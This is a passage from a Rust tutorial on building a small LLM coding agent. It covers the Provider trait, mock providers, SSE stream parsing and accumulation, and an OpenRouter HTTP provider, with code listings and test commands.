#[derive(Debug, Clone, Default)]
pub struct TokenUsage {
    pub input_tokens: u64,
    pub output_tokens: u64,
}
}

The starter uses a simplified TokenUsage with just input and output token counts. It is stored as Option<TokenUsage> in AssistantTurn -- mock providers in tests set it to None, while the real OpenRouterProvider populates it from the API response.

The Default impl is covered by test_cost_tracker_token_usage_default in tests/cost_tracker.rs (used again in Chapter 17). If you want to run it in isolation:

cargo test -p mini-claw-code-starter test_cost_tracker_token_usage_default

1.9 The Provider trait

The Provider trait

The Provider trait is defined in src/types.rs. It abstracts over any LLM backend:

#![allow(unused)]
fn main() {
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
}

Unlike Tool, Provider uses RPITIT (return-position impl Trait in traits) rather than #[async_trait]. The full trade-off is covered in Why two async trait styles?.

A blanket impl lets Arc<P> also be a Provider, which is needed later for sharing a provider between an agent and its subagents:

#![allow(unused)]
fn main() {
impl<P: Provider> Provider for Arc<P> { ... }
}

We implement the MockProvider in Chapter 5a and the OpenRouterProvider in Chapter 5b.


Putting it all together

After implementing src/types.rs, run the full chapter test suite:

cargo test -p mini-claw-code-starter test_mock_

What the tests verify

  • test_mock_message_user -- constructs a Message::User and verifies it holds the expected string
  • test_mock_message_system -- constructs a Message::System and verifies it holds the expected string
  • test_mock_message_tool_result -- constructs a Message::ToolResult and verifies both id and content are correct
  • test_mock_assistant_turn -- builds an AssistantTurn with text and verifies stop_reason is Stop
  • test_mock_tool_definition_builder -- uses the builder to add parameters and verifies the resulting JSON schema has the correct structure
  • test_mock_tool_definition_optional_param -- adds an optional parameter and verifies it does not appear in the required array
  • test_mock_toolset_empty -- creates an empty ToolSet and verifies get() returns None for any name
  • test_mock_token_usage_default -- verifies that TokenUsage::default() initializes both counters to zero

What you built

This chapter established the type vocabulary for the entire agent:

  • Message -- a four-variant enum carrying every kind of conversation entry: system instructions, user input, assistant responses, and tool results.
  • AssistantTurn -- the model's response, containing optional text, tool calls, a stop reason, and optional token usage.
  • StopReason -- the binary signal that drives the agent loop: keep going or stop.
  • ToolDefinition -- a builder for JSON Schema tool descriptions that the LLM uses to understand what tools are available.
  • ToolCall -- the request side of tool execution, linked by ID to Message::ToolResult.
  • Tool trait -- the minimal async interface every tool must implement: definition() and call().
  • ToolSet -- a HashMap-backed registry for looking up tools by name at runtime.
  • Provider trait -- the async LLM abstraction, generic over any backend.
  • TokenUsage -- per-request token tracking.

Key takeaway

The entire agent -- tools, providers, the loop itself -- is built on the vocabulary defined in this chapter. Getting these types right (especially the Message enum and StopReason) determines whether the agent loop is simple or tangled. The types are the contract; everything else is implementation.

None of these types do anything on their own -- they are the nouns of the system. In the next chapter, we will implement the MockProvider and OpenRouterProvider, giving these types their first verbs.

Check yourself


← Chapter 3: The Agentic Loop · Contents · Chapter 5a: Provider & Streaming Foundations →

Chapter 5a: Provider & Streaming Foundations

File(s) to edit: src/streaming.rs — every stub tagged TODO ch5a: (everything except StreamingAgent, which is Ch5b's).

src/mock.rs already carries the MockProvider stubs you filled in Chapter 1; this chapter leans on that work but does not re-fill it. If you skipped ahead from Ch1, go back and finish the TODO ch1: stubs first. Tests to run: cargo test -p mini-claw-code-starter test_mock_ and cargo test -p mini-claw-code-starter test_streaming_parse_ test_streaming_accumulator_ Estimated time: 35 min

Goal

  • Revisit MockProvider (built in Ch1) as the canonical example of the Provider trait, and use it to motivate the streaming siblings below.
  • Implement parse_sse_line so we can turn a single SSE line into StreamEvents.
  • Implement StreamAccumulator so a stream of deltas reassembles into a complete AssistantTurn.
  • Implement MockStreamProvider so UI-facing code can be tested without a real HTTP connection.
  • Understand when to reach for std::sync::Mutex vs tokio::sync::Mutex in async code.

Chapter 4 defined the data that flows through the agent. This chapter (and the next) turn those types into something that can actually drive data — an LLM backend. We split the work in two halves:

  • Ch5a (this chapter): the abstractions and testable foundations — traits, mock providers, SSE parsing, stream accumulation.
  • Ch5b: the real HTTP provider (OpenRouterProvider) and the StreamingAgent that wires a stream channel through the agent loop.

Keeping streaming plumbing (this chapter) separate from networking and orchestration (next chapter) makes each part testable in isolation.


How streaming works end-to-end

For orientation, here is what the finished system looks like. Don't worry about the StreamingAgent and OpenRouter API boxes yet — those belong to 5b. This chapter builds every other box.

sequenceDiagram
    participant Agent
    participant StreamProvider
    participant API as LLM API
    participant Channel as mpsc channel
    participant UI

    Agent->>StreamProvider: stream_chat(messages, tools, tx)
    StreamProvider->>API: POST /chat/completions (stream: true)
    loop SSE chunks
        API-->>StreamProvider: data: {"delta": ...}
        StreamProvider->>StreamProvider: parse_sse_line
        StreamProvider->>Channel: send(StreamEvent)
        StreamProvider->>StreamProvider: accumulator.feed(event)
        Channel-->>UI: recv() and render
    end
    API-->>StreamProvider: data: [DONE]
    StreamProvider->>Agent: return accumulator.finish()

Why a trait?

A coding agent needs to call an LLM, but which LLM should not be hard-coded. During tests we want instant, deterministic responses. In production we want streaming over HTTP. The Provider trait gives us that seam.

Claude Code uses a similar abstraction internally — every LLM call goes through a provider interface, and the choice of backend (Anthropic API, Bedrock, Vertex) is resolved at startup.

The Provider trait (RPITIT)

Here is the full trait:

#![allow(unused)]
fn main() {
pub trait Provider: Send + Sync {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
}

A few things to notice:

No #[async_trait]. The Provider trait uses return-position impl Trait in traits (RPITIT) — stabilized in Rust 1.75. Writing fn chat(...) -> impl Future<...> instead of async fn chat(...) gives us explicit control over the lifetime and Send bound; async fn in a trait does not always infer Send for the returned future, which would prevent spawning onto a multi-threaded runtime. The explicit impl Future<...> + Send + 'a signature solves that, and it avoids the heap allocation that #[async_trait] would require.

The Tool trait in Chapter 6 uses #[async_trait] for the opposite reason — object safety for heterogeneous storage. For the full explanation of when to pick which style, see Why two async trait styles?. The one-liner version is also in Chapter 2.

Why Send + Sync on the trait itself? Our agent loop will hold a P: Provider behind a shared reference (and later behind Arc). The Sync bound lets multiple tasks share the provider, and Send lets it cross thread boundaries.

Lifetime 'a everywhere. The returned future borrows both &self and the input slices. Tying them to a single lifetime 'a tells the compiler the future lives no longer than those borrows, avoiding 'static requirements.

The Provider trait is already defined in src/types.rs (Chapter 4). The starter puts it alongside the message types because everything lives in a flat layout.

The Arc<P> blanket impl

Directly below the Provider trait, the starter has:

#![allow(unused)]
fn main() {
impl<P: Provider> Provider for Arc<P> {
    fn chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a {
        (**self).chat(messages, tools)
    }
}
}

This says: "if P is a Provider, then Arc<P> is also a Provider." It just dereferences through the Arc and delegates to the inner value.

Why does this matter? Later, when we build subagents, the main agent and its subagents will share the same provider. Cloning an Arc is cheap, and the blanket impl means subagent code that is generic over P: Provider works identically whether it receives a bare provider or a shared one. Without this impl, you would need separate type plumbing to pass shared providers around.

Both the Provider trait and the Arc<P> blanket impl are already in src/types.rs.


MockProvider

Testing an agent against a live API is slow, expensive, and nondeterministic. The MockProvider lets you script exact responses and verify that your agent handles them correctly.

#![allow(unused)]
fn main() {
use std::collections::VecDeque;
use std::sync::Mutex;

pub struct MockProvider {
    responses: Mutex<VecDeque<AssistantTurn>>,
}

impl MockProvider {
    pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
        Self {
            responses: Mutex::new(responses),
        }
    }
}

impl Provider for MockProvider {
    async fn chat(
        &self,
        _messages: &[Message],
        _tools: &[&ToolDefinition],
    ) -> anyhow::Result<AssistantTurn> {
        self.responses
            .lock()
            .unwrap()
            .pop_front()
            .ok_or_else(|| anyhow::anyhow!("MockProvider: no more responses"))
    }
}
}

Rust concept: std::sync::Mutex vs tokio::sync::Mutex

The Provider trait takes &self (not &mut self), because providers are shared. But we need to mutate the queue. Which Mutex should we use?

The rule of thumb: use std::sync::Mutex when the critical section is trivial (no .await inside the lock), and tokio::sync::Mutex when you need to hold the lock across an .await point. Here the critical section is just a pop_front — a single pointer operation. Using tokio::sync::Mutex would add unnecessary overhead (it is an async-aware lock that yields to the runtime). std::sync::Mutex is cheaper and perfectly safe because the lock is never held long enough to block the runtime.

The design:

  • VecDeque — responses are consumed in FIFO order. The first call to chat returns the first response, the second call returns the second, and so on.
  • Mutex — wraps the queue so &self methods can mutate it. See the Rust concept note above for why std::sync::Mutex is the right choice here.
  • Error on exhaustion — if the test scripts three responses but the agent calls chat a fourth time, it gets an error instead of a silent panic. This catches agent loops that spin more times than expected.

Testing strategy

The MockProvider is the foundation of all our tests. By scripting the exact sequence of responses, you can test:

  • Single-turn: one response with StopReason::Stop
  • Tool use loops: first response has StopReason::ToolUse with tool calls, the agent executes them and sends results back, second response has StopReason::Stop
  • Multi-turn sequences: any number of scripted turns
  • Error handling: an empty queue returns an error

A typical test:

#![allow(unused)]
fn main() {
#[tokio::test]
async fn mock_returns_text() {
    let provider = MockProvider::new(VecDeque::from([AssistantTurn {
        text: Some("Hello!".into()),
        tool_calls: vec![],
        stop_reason: StopReason::Stop,
        usage: None,
    }]));
    let turn = provider.chat(&[Message::User("Hi".into())], &[]).await.unwrap();
    assert_eq!(turn.text.as_deref(), Some("Hello!"));
}
}

Notice that the test ignores the messages input — the mock does not look at what the agent sends. This is intentional. You are testing the agent's behavior given a known provider response, not the provider's ability to understand prompts.

Your task

Open src/mock.rs in the starter. You will see the MockProvider struct with unimplemented!() stubs. Fill in new() and the Provider impl.


StreamEvent

Before defining the streaming trait, we need a vocabulary for the incremental chunks an LLM sends back:

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, PartialEq)]
pub enum StreamEvent {
    /// A fragment of the model's text response.
    TextDelta(String),
    /// The beginning of a tool call (carries the call ID and tool name).
    ToolCallStart {
        index: usize,
        id: String,
        name: String,
    },
    /// A fragment of a tool call's JSON arguments.
    ToolCallDelta {
        index: usize,
        arguments: String,
    },
    /// The stream is complete.
    Done,
}
}

These four variants map directly to the OpenAI streaming API:

  • TextDelta — a fragment of the model's natural-language output (e.g. "Hello", then " world").
  • ToolCallStart — the model has begun a tool call. index identifies which call (a single turn can request multiple tools), id is a server-assigned correlation ID, and name is the tool.
  • ToolCallDelta — a fragment of the JSON arguments for the call at index. Arguments arrive incrementally because the model generates JSON token-by-token.
  • Done — end-of-stream signal.

The index field matters because streaming interleaves fragments from multiple tool calls, and consumers need to know which call each fragment belongs to.

The StreamProvider trait

#![allow(unused)]
fn main() {
pub trait StreamProvider: Send + Sync {
    fn stream_chat<'a>(
        &'a self,
        messages: &'a [Message],
        tools: &'a [&'a ToolDefinition],
        tx: mpsc::UnboundedSender<StreamEvent>,
    ) -> impl Future<Output = anyhow::Result<AssistantTurn>> + Send + 'a;
}
}

The design uses a channel-based streaming model rather than returning an AsyncIterator or Stream. The caller creates a tokio::sync::mpsc::unbounded_channel(), passes the sender half to stream_chat, and reads events from the receiver half — typically in a separate task that renders them to the terminal.

The method itself still returns the fully assembled AssistantTurn when the stream is complete. This means the agent loop always gets a clean AssistantTurn to work with, regardless of whether streaming is enabled. The channel is a side-channel for the UI.

Why UnboundedSender instead of a bounded channel? Streaming events are tiny and arrive at network speed, not faster. Backpressure is unnecessary because the bottleneck is the API, not the consumer. An unbounded channel keeps the API simpler.

The StreamEvent enum and StreamProvider trait both live in src/streaming.rs in the starter.


MockStreamProvider

The MockStreamProvider wraps a MockProvider and synthesizes StreamEvents from each canned response. This lets you test UI code that consumes stream events without needing a real HTTP connection.

The struct wraps a MockProvider and its stream_chat impl works in three steps:

  1. Delegate to self.inner.chat() to get the canned AssistantTurn
  2. Decompose it into events: text is sent character-by-character as TextDelta events, each tool call emits a ToolCallStart + single ToolCallDelta, and a final Done is sent
  3. Return the original AssistantTurn unchanged

Here is the full implementation:

#![allow(unused)]
fn main() {
pub struct MockStreamProvider {
    inner: MockProvider,
}

impl MockStreamProvider {
    pub fn new(responses: VecDeque<AssistantTurn>) -> Self {
        Self {
            inner: MockProvider::new(responses),
        }
    }
}

impl StreamProvider for MockStreamProvider {
    async fn stream_chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
        tx: mpsc::UnboundedSender<StreamEvent>,
    ) -> anyhow::Result<AssistantTurn> {
        let turn = self.inner.chat(messages, tools).await?;

        // Synthesize stream events from the complete turn
        if let Some(ref text) = turn.text {
            for ch in text.chars() {
                let _ = tx.send(StreamEvent::TextDelta(ch.to_string()));
            }
        }
        for (i, call) in turn.tool_calls.iter().enumerate() {
            let _ = tx.send(StreamEvent::ToolCallStart {
                index: i,
                id: call.id.clone(),
                name: call.name.clone(),
            });
            let _ = tx.send(StreamEvent::ToolCallDelta {
                index: i,
                arguments: call.arguments.to_string(),
            });
        }
        let _ = tx.send(StreamEvent::Done);

        Ok(turn)
    }
}
}

This avoids duplicating the response queue logic — the inner.chat() call handles the VecDeque pop. The let _ = tx.send(...) pattern intentionally ignores send errors — if the receiver is dropped, nobody is listening, and that is fine.

Your task

Fill in MockStreamProvider::new() and its stream_chat() stub in src/streaming.rs.


Server-Sent Events and parse_sse_line

When the real provider requests stream: true, the API returns a stream of Server-Sent Events (SSE). SSE is a simple text protocol over HTTP:

data: {"choices":[{"delta":{"content":"Hello"},"finish_reason":null}]}

data: {"choices":[{"delta":{"content":" world"},"finish_reason":null}]}

data: [DONE]

Each event is a line starting with data: followed by a JSON payload (or the special string [DONE]). Events are separated by blank lines. That is the entire protocol — no framing, no length prefixes, just newline-delimited text. This simplicity is why SSE is the standard for LLM streaming.

Our parse_sse_line function handles a single line:

#![allow(unused)]
fn main() {
pub fn parse_sse_line(line: &str) -> Option<Vec<StreamEvent>> {
    let data = line.strip_prefix("data: ")?;
    if data == "[DONE]" {
        return Some(vec![StreamEvent::Done]);
    }

    let chunk: ChunkResponse = serde_json::from_str(data).ok()?;
    let choice = chunk.choices.into_iter().next()?;
    let mut events = Vec::new();

    if let Some(text) = choice.delta.content
        && !text.is_empty()
    {
        events.push(StreamEvent::TextDelta(text));
    }

    if let Some(tool_calls) = choice.delta.tool_calls {
        for tc in tool_calls {
            if let Some(id) = tc.id {
                let name = tc.function
                    .as_ref()
                    .and_then(|f| f.name.clone())
                    .unwrap_or_default();
                events.push(StreamEvent::ToolCallStart {
                    index: tc.index,
                    id,
                    name,
                });
            }
            if let Some(ref func) = tc.function
                && let Some(ref args) = func.arguments
                && !args.is_empty()
            {
                events.push(StreamEvent::ToolCallDelta {
                    index: tc.index,
                    arguments: args.clone(),
                });
            }
        }
    }

    if events.is_empty() { None } else { Some(events) }
}
}

Walk through the logic:

  1. Strip the data: prefix. Lines that do not start with data: (like event: ping or blank lines) return None — they are not data events.
  2. Check for [DONE]. This is the OpenAI-standard end-of-stream sentinel. Return a Done event.
  3. Parse JSON into ChunkResponse. If the JSON is malformed, .ok()? silently skips it. This is intentional — SSE streams occasionally include keep-alive pings or malformed chunks, and crashing would be worse than dropping a token.
  4. Extract text deltas. The delta.content field contains the text fragment. Empty strings are skipped.
  5. Extract tool call events. A single chunk can contain both a ToolCallStart (when the id field is present, signaling a new call) and a ToolCallDelta (when arguments is present). The if let ... && let ... syntax is Rust's let-chains feature, stabilized in edition 2024.

Rust concept: let-chains

The if let Some(ref func) = tc.function && let Some(ref args) = func.arguments syntax combines two pattern matches into a single if expression. Before let-chains, you would need nested if let blocks or a match with a tuple. Let-chains flatten the nesting and make the condition more readable. The ref keyword borrows the matched value instead of moving it, which is necessary here because tc is used again after the if let.

The tests verify the parser against three cases: a text delta line produces StreamEvent::TextDelta("Hello"), the data: [DONE] line produces StreamEvent::Done, and non-data lines like event: ping or empty strings return None.

Your task

The parse_sse_line function and its SSE deserialization types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) are in src/streaming.rs. Fill in the parse_sse_line stub.


StreamAccumulator

Streaming gives the UI real-time output, but the agent loop needs a complete AssistantTurn to decide what to do next. The StreamAccumulator bridges this gap — it collects events as they arrive and produces a finished message at the end.

#![allow(unused)]
fn main() {
pub struct StreamAccumulator {
    text: String,
    tool_calls: Vec<PartialToolCall>,
}

struct PartialToolCall {
    id: String,
    name: String,
    arguments: String,
}
}

The two key methods:

#![allow(unused)]
fn main() {
impl StreamAccumulator {
    pub fn new() -> Self {
        Self {
            text: String::new(),
            tool_calls: Vec::new(),
        }
    }

    pub fn feed(&mut self, event: &StreamEvent) {
        match event {
            StreamEvent::TextDelta(s) => self.text.push_str(s),
            StreamEvent::ToolCallStart { index, id, name } => {
                // Ensure the Vec is large enough for this index
                while self.tool_calls.len() <= *index {
                    self.tool_calls.push(PartialToolCall {
                        id: String::new(),
                        name: String::new(),
                        arguments: String::new(),
                    });
                }
                self.tool_calls[*index].id = id.clone();
                self.tool_calls[*index].name = name.clone();
            }
            StreamEvent::ToolCallDelta { index, arguments } => {
                if let Some(tc) = self.tool_calls.get_mut(*index) {
                    tc.arguments.push_str(arguments);
                }
            }
            StreamEvent::Done => {}
        }
    }

    pub fn finish(self) -> AssistantTurn {
        let text = if self.text.is_empty() {
            None
        } else {
            Some(self.text)
        };
        let tool_calls: Vec<ToolCall> = self
            .tool_calls
            .into_iter()
            .filter(|tc| !tc.name.is_empty())
            .map(|tc| ToolCall {
                id: tc.id,
                name: tc.name,
                arguments: serde_json::from_str(&tc.arguments)
                    .unwrap_or(Value::Null),
            })
            .collect();
        let stop_reason = if tool_calls.is_empty() {
            StopReason::Stop
        } else {
            StopReason::ToolUse
        };
        AssistantTurn {
            text,
            tool_calls,
            stop_reason,
            usage: None,
        }
    }
}
}

Design notes:

  • feed appends incrementally. Text fragments concatenate into self.text. Tool call arguments concatenate per-index into PartialToolCall::arguments.
  • Sparse index handling. The while loop in ToolCallStart pads the vector with empty entries so that index: 2 works even if the vector only has one element. The filter(|tc| !tc.name.is_empty()) in finish strips those placeholders.
  • Deferred JSON parsing. Arguments arrive as string fragments during streaming. finish parses the concatenated string into serde_json::Value only after the stream ends, falling back to Value::Null on malformed JSON.
  • stop_reason is derived from the tool calls. If any survived the filter, it is ToolUse; otherwise Stop. Usage is None because most streaming APIs do not include token counts per chunk.

The accumulator tests (test_streaming_accumulator_text, test_streaming_accumulator_tool_call) feed two text deltas or a tool-call-start plus two argument fragments and verify that the concatenated result is what you'd expect.

Your task

The StreamAccumulator and PartialToolCall are in src/streaming.rs. Fill in the new(), feed(), and finish() stubs.


Run the tests

cargo test -p mini-claw-code-starter test_mock_
cargo test -p mini-claw-code-starter test_streaming_parse_
cargo test -p mini-claw-code-starter test_streaming_accumulator_

What these tests verify

test_mock_ (MockProvider):

  • test_mock_mock_returns_text — scripts a single text response and verifies chat() returns it
  • test_mock_mock_exhausted — calls chat() on an empty queue and verifies it returns an error

test_streaming_parse_ (SSE parser):

  • test_streaming_parse_text_delta — feeds a data: line with text content and verifies a TextDelta event is produced
  • test_streaming_parse_done — feeds data: [DONE] and verifies a Done event is produced
  • test_streaming_parse_non_data_lines — feeds a non-data line like event: ping and verifies None is returned

test_streaming_accumulator_ (stream reassembly):

  • test_streaming_accumulator_text — feeds two TextDelta events and verifies the concatenated result
  • test_streaming_accumulator_tool_call — feeds a ToolCallStart and two ToolCallDelta fragments, verifies they reassemble into a valid ToolCall with parsed JSON arguments

Everything else (test_openrouter_, test_streaming_streaming_agent_, test_streaming_stream_chat_) belongs to Chapter 5b.


Key takeaway

The provider layer decouples the agent from any specific LLM backend. MockProvider makes tests fast and deterministic; the StreamProvider trait pipes incremental events out on a channel while the method itself still returns a clean AssistantTurn; StreamAccumulator is the bridge that lets the UI see tokens as they arrive while the agent loop sees a complete message.

Everything in this chapter is testable without a network. Next up in Chapter 5b, we plug these primitives into a real HTTP provider and wire the events channel through the agent loop.

Check yourself


← Chapter 4: Messages & Types · Contents · Chapter 5b: OpenRouter & StreamingAgent →

Chapter 5b: OpenRouter & StreamingAgent

File(s) to edit: src/providers/openrouter.rs, src/streaming.rs (the StreamingAgent block at the bottom) Tests to run: cargo test -p mini-claw-code-starter test_openrouter_, cargo test -p mini-claw-code-starter test_streaming_streaming_agent_, cargo test -p mini-claw-code-starter test_streaming_stream_chat_ Estimated time: 35 min

Goal

  • Implement OpenRouterProvider so the agent can talk to a real OpenAI-compatible API — both non-streaming and streaming.
  • Implement StreamingAgent::chat — the agent loop that forwards streaming text deltas to a UI channel while running tools.

Chapter 5a built the abstractions (Provider, StreamProvider, StreamEvent), the mocks (MockProvider, MockStreamProvider), and the parse/accumulate machinery (parse_sse_line, StreamAccumulator). This chapter plugs those pieces into a real HTTP provider and wires a streaming channel through the agent loop.

If anything below assumes parse_sse_line or StreamAccumulator exists — it does, because you implemented it in 5a.

If Go is your native async language, here is the translation table you need before reading the streaming code. Everything in this chapter rests on these five primitives; skip this box if you already think in tokio.

GoTokioNotes
go func() { ... }()tokio::spawn(async { ... })Both fire-and-forget. tokio::spawn returns a JoinHandle you can await later if you care about the result.
ch := make(chan T, n)let (tx, rx) = tokio::sync::mpsc::channel::<T>(n)Bounded channel. For unbounded_channel() use mpsc::unbounded_channel() -- analogous to a channel with infinite buffer.
ch <- vtx.send(v).awaitAsync send in Tokio (awaits when buffer full). The unbounded variant uses tx.send(v) with no .await.
v, ok := <-chlet Some(v) = rx.recv().await { ... }recv returns None when all senders are dropped (equivalent to close(ch) + drain).
close(ch)drop every tx cloneTokio has no explicit close. When the last sender is dropped, receivers see None and loops exit.
wg.Add(1); wg.Wait()handle.await (or tokio::join!, try_join!)A JoinHandle is like a single-goroutine WaitGroup. Multiple handles: tokio::join!(h1, h2) runs them concurrently.
select { case <-a: case <-b: }tokio::select! { _ = a => ..., _ = b => ... }Direct analogue. Loses on non-disjoint branches unless you use biased;.

One non-obvious point specific to this chapter: we signal "the stream is over" by dropping the sender. There is no explicit close call. The receiver task observes rx.recv().await == None and exits its loop. If you forget to drop the sender (for example by holding it inside an Arc that outlives the producer), the receiver hangs forever -- this is one of the deadlock patterns that §"Why not just rx.recv() in the main loop?" walks through.


OpenRouterProvider

With the parsing infrastructure in place, we can build the real provider. It targets the OpenRouter API, which is OpenAI-compatible — the same request/response format works with OpenAI, Together, Groq, and many others.

API types

The provider needs serde types for the request and response payloads. Here is the request side:

#![allow(unused)]
fn main() {
#[derive(Serialize)]
struct ChatRequest<'a> {
    model: &'a str,
    messages: Vec<ApiMessage>,
    #[serde(skip_serializing_if = "Vec::is_empty")]
    tools: Vec<ApiTool>,
    #[serde(skip_serializing_if = "std::ops::Not::not")]
    stream: bool,
}
}

The skip_serializing_if annotations keep the JSON clean — tools is omitted when empty (some models choke on an empty array), and stream is omitted when false (the default for the API).

ApiMessage, ApiToolCall, ApiFunction, ApiTool, and ApiToolDef mirror the OpenAI message format. The response types (ChatResponse, Choice, ResponseMessage) deserialize the non-streaming response. The chunk types (ChunkResponse, ChunkChoice, Delta, DeltaToolCall, DeltaFunction) deserialize the streaming response — you already implemented those in 5a for parse_sse_line.

Conversion helpers

Two impl methods on OpenRouterProvider translate between our internal types and the API format. convert_messages handles the four Message variants:

#![allow(unused)]
fn main() {
pub(crate) fn convert_messages(messages: &[Message]) -> Vec<ApiMessage> {
    let mut out = Vec::new();
    for msg in messages {
        match msg {
            Message::System(text) => out.push(ApiMessage {
                role: "system".into(),
                content: Some(text.clone()),
                tool_calls: None,
                tool_call_id: None,
            }),
            Message::User(text) => out.push(ApiMessage {
                role: "user".into(),
                content: Some(text.clone()),
                tool_calls: None,
                tool_call_id: None,
            }),
            Message::Assistant(turn) => out.push(ApiMessage {
                role: "assistant".into(),
                content: turn.text.clone(),
                tool_calls: if turn.tool_calls.is_empty() {
                    None
                } else {
                    Some(
                        turn.tool_calls
                            .iter()
                            .map(|c| ApiToolCall {
                                id: c.id.clone(),
                                type_: "function".into(),
                                function: ApiFunction {
                                    name: c.name.clone(),
                                    arguments: c.arguments.to_string(),
                                },
                            })
                            .collect(),
                    )
                },
                tool_call_id: None,
            }),
            Message::ToolResult { id, content } => out.push(ApiMessage {
                role: "tool".into(),
                content: Some(content.clone()),
                tool_calls: None,
                tool_call_id: Some(id.clone()),
            }),
        }
    }
    out
}
}

Four details worth pausing on:

  • System and User are symmetric. Same shape, different role string. Everything else (tool_calls, tool_call_id) is None.
  • Assistant is the variant with the nuance. The text field maps directly to content, but the tool calls have to be reserialised. c.arguments is a serde_json::Value; the OpenAI API wants it as a JSON string, so we call .to_string() to turn the Value back into text. Emitting an empty tool_calls: [] array makes some providers reject the request as malformed, so we send None instead.
  • ToolResult becomes role: "tool". This is the variant that ties a result back to its originating call via tool_call_id. Without that id the provider cannot associate the result with the call, and the next response is usually an error.
  • No default branch. Every Message variant is handled explicitly. If you add a new variant in Chapter 4, the match will fail to compile here until you decide how it should serialise — which is the behaviour we want.

convert_tools is simpler: wrap each ToolDefinition in the OpenAI function-calling envelope.

#![allow(unused)]
fn main() {
pub(crate) fn convert_tools(tools: &[&ToolDefinition]) -> Vec<ApiTool> {
    tools
        .iter()
        .map(|t| ApiTool {
            type_: "function",
            function: ApiToolDef {
                name: t.name,
                description: t.description,
                parameters: t.parameters.clone(),
            },
        })
        .collect()
}
}

The envelope is a fixed shape: { "type": "function", "function": { name, description, parameters } }. Every OpenAI-compatible provider expects exactly this, and our ToolDefinition was designed in Ch4 specifically so this mapping is a one-liner.

The provider struct

#![allow(unused)]
fn main() {
pub struct OpenRouterProvider {
    client: reqwest::Client,
    api_key: String,
    model: String,
    base_url: String,
}
}

The struct holds a reusable reqwest::Client, the API key, model name, and base URL. Constructors include new(api_key, model) for explicit creation, from_env() which loads OPENROUTER_API_KEY via dotenvy, and a base_url(self, url) builder method for overriding the endpoint (useful for local testing or alternative providers).

Non-streaming Provider impl

The non-streaming path is the simpler one: one POST, one JSON response, one AssistantTurn returned. Here it is end to end:

#![allow(unused)]
fn main() {
impl Provider for OpenRouterProvider {
    async fn chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
    ) -> anyhow::Result<AssistantTurn> {
        let body = ChatRequest {
            model: &self.model,
            messages: Self::convert_messages(messages),
            tools: Self::convert_tools(tools),
            stream: false,
        };

        let resp: ChatResponse = self
            .client
            .post(format!("{}/chat/completions", self.base_url))
            .bearer_auth(&self.api_key)
            .json(&body)
            .send()
            .await
            .context("request failed")?
            .error_for_status()
            .context("API returned error status")?
            .json()
            .await
            .context("failed to parse response")?;

        let choice = resp.choices.into_iter().next().context("no choices")?;

        let tool_calls = choice
            .message
            .tool_calls
            .unwrap_or_default()
            .into_iter()
            .map(|tc| {
                let arguments =
                    serde_json::from_str(&tc.function.arguments).unwrap_or(Value::Null);
                ToolCall {
                    id: tc.id,
                    name: tc.function.name,
                    arguments,
                }
            })
            .collect();

        let stop_reason = match choice.finish_reason.as_deref() {
            Some("tool_calls") => StopReason::ToolUse,
            _ => StopReason::Stop,
        };

        let usage = resp.usage.map(|u| TokenUsage {
            input_tokens: u.prompt_tokens.unwrap_or(0),
            output_tokens: u.completion_tokens.unwrap_or(0),
        });

        Ok(AssistantTurn {
            text: choice.message.content,
            tool_calls,
            stop_reason,
            usage,
        })
    }
}
}

Three decisions to notice:

  • error_for_status() turns HTTP 4xx/5xx into an Err. Otherwise a 403 from OpenRouter would deserialize whatever body came back as if it were a ChatResponse and fail confusingly later.
  • Tool-call arguments arrive as a JSON string, not a Value. The OpenAI spec puts "arguments": "{\"path\":\"foo.rs\"}" in the wire format. We parse it back into a Value ourselves; on a parse failure we fall back to Value::Null so a malformed arguments field does not abort the whole turn.
  • stop_reason is a straight mapping of finish_reason. Only "tool_calls" becomes ToolUse; everything else ("stop", "length", null, missing) becomes Stop. This matches the "the model decides" story from Chapter 3's aside -- we are just translating the model's own stop signal.

Streaming StreamProvider impl

The streaming path is the same request shape with stream: true, but instead of a single JSON body we read a chunked HTTP response and parse it as Server-Sent Events. Here is the complete impl:

#![allow(unused)]
fn main() {
impl crate::streaming::StreamProvider for OpenRouterProvider {
    async fn stream_chat(
        &self,
        messages: &[Message],
        tools: &[&ToolDefinition],
        tx: tokio::sync::mpsc::UnboundedSender<crate::streaming::StreamEvent>,
    ) -> anyhow::Result<AssistantTurn> {
        use crate::streaming::{StreamAccumulator, parse_sse_line};

        let body = ChatRequest {
            model: &self.model,
            messages: Self::convert_messages(messages),
            tools: Self::convert_tools(tools),
            stream: true,
        };

        let mut resp = self
            .client
            .post(format!("{}/chat/completions", self.base_url))
            .bearer_auth(&self.api_key)
            .json(&body)
            .send()
            .await
            .context("request failed")?
            .error_for_status()
            .context("API returned error status")?;

        let mut acc = StreamAccumulator::new();
        let mut buffer = String::new();

        while let Some(chunk) = resp.chunk().await.context("failed to read chunk")? {
            buffer.push_str(&String::from_utf8_lossy(&chunk));

            while let Some(newline_pos) = buffer.find('\n') {
                let line = buffer[..newline_pos].trim_end_matches('\r').to_string();
                buffer = buffer[newline_pos + 1..].to_string();

                if line.is_empty() {
                    continue;
                }

                if let Some(events) = parse_sse_line(&line) {
                    for event in events {
                        acc.feed(&event);
                        let _ = tx.send(event);
                    }
                }
            }
        }

        Ok(acc.finish())
    }
}
}

Walk through it:

  1. Same request, but stream: true. The API returns a chunked HTTP response instead of a single JSON body. The request construction and auth are identical to the non-streaming path; this is exactly what we want from an abstraction called "streaming".
  2. Read raw byte chunks. resp.chunk() returns Option<Bytes> — the HTTP body arrives in arbitrary-sized pieces that do not align with SSE event boundaries. A single chunk could be a partial line, several lines, or multiple events crammed together.
